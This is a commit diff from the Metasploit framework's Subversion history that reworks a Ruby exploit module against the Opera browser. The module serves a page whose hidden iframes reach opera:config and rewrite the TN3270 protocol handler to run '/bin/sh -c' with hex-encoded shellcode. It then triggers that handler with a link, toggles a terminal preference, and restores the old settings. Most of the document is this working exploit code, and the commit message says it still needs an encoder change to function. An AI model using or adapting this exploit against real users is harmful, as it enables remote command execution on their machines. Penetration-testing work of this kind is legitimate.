see #594. remove some extraneous junk, don't run the shell in a terminal (it dies immediately). space is the only badchar. still doesn't actually work without a modification to encoder/cmd/generic_sh.
git-svn-id: file:///home/svn/framework3/trunk@7680 4d416f70-5f16-0410-b530-b9f4589650daunstable
James Lee
parent
8e5d2b98b0
commit
8e0eef03c6
|
|
@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'ExitFunc' => 'process',
|
||||
'Space' => 2048,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => " |'<>&",
|
||||
'BadChars' => " ",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
@ -71,27 +71,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Not sure when this was disclosed but it's been known since at
|
||||
# least March 5, 2007, since that's the release date on the version
|
||||
# of mpack I stole this from.
|
||||
'DisclosureDate' => 'Mar 5 2007'
|
||||
'DisclosureDate' => 'Mar 5 2007',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Got request #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /payload$/
|
||||
print_status("Generating payload for #{target} #{target.platform}")
|
||||
# Re-generate the payload
|
||||
if ((p = regenerate_payload(cli)) == nil)
|
||||
print_error("Payload generation failed, 404ing request for #{request.uri}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
# NOTE: Change this to the new API when commiting to trunk
|
||||
#content = Msf::Util::EXE.to_win32pe(p.encoded)
|
||||
#content = Rex::Text.to_win32pe(p.encoded)
|
||||
content = "foo"
|
||||
print_status("Generated #{content.length} bytes")
|
||||
headers = { 'Content-Type' => 'application/octet-stream' }
|
||||
when get_resource
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
content = "<body><script>"
|
||||
|
|
@ -105,13 +93,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
send_response_html(cli, content, headers)
|
||||
|
||||
print_status("Done with request #{request.uri}")
|
||||
end
|
||||
|
||||
def generate_evil_js(cli, request)
|
||||
# There are a bunch of levels of quotes here, so the easiest way to
|
||||
# make everything line up is to hex escape the command to run
|
||||
p = regenerate_payload(cli).encoded
|
||||
#print_status(p)
|
||||
$stdout.puts(p.class)
|
||||
print_status(p)
|
||||
send_not_found(cli) && return if not p
|
||||
|
||||
shellcode = Rex::Text.to_hex(p, "%")
|
||||
js = <<ENDJS
|
||||
blank_iframe = document.createElement('iframe');
|
||||
|
|
@ -121,33 +113,32 @@ blank_iframe.setAttribute('style', 'display:none');
|
|||
document.body.appendChild(blank_iframe);
|
||||
blank_iframe_window.eval(
|
||||
"config_iframe = document.createElement('iframe');" +
|
||||
"config_iframe.setAttribute('id', 'config_iframe_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"cache_iframe = document.createElement('iframe');" +
|
||||
"cache_iframe.src = 'opera:cache';" +
|
||||
"cache_iframe.onload = function ()" +
|
||||
"{" +
|
||||
" config_iframe_window.eval" +
|
||||
" (\\"" +
|
||||
"config_iframe.setAttribute('id', 'config_iframe_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"cache_iframe = document.createElement('iframe');" +
|
||||
"cache_iframe.src = 'opera:cache';" +
|
||||
"cache_iframe.onload = function ()" +
|
||||
"{" +
|
||||
" config_iframe_window.eval" +
|
||||
" (\\"" +
|
||||
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
||||
" old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
|
||||
" shellcode = '#{shellcode}';" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" \\");" +
|
||||
"};" +
|
||||
"document.body.appendChild(cache_iframe);" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
|
||||
" \\");" +
|
||||
"};" +
|
||||
"document.body.appendChild(cache_iframe);" +
|
||||
"");
|
||||
ENDJS
|
||||
|
||||
end
|
||||
|
||||
def generate_evil_preference()
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue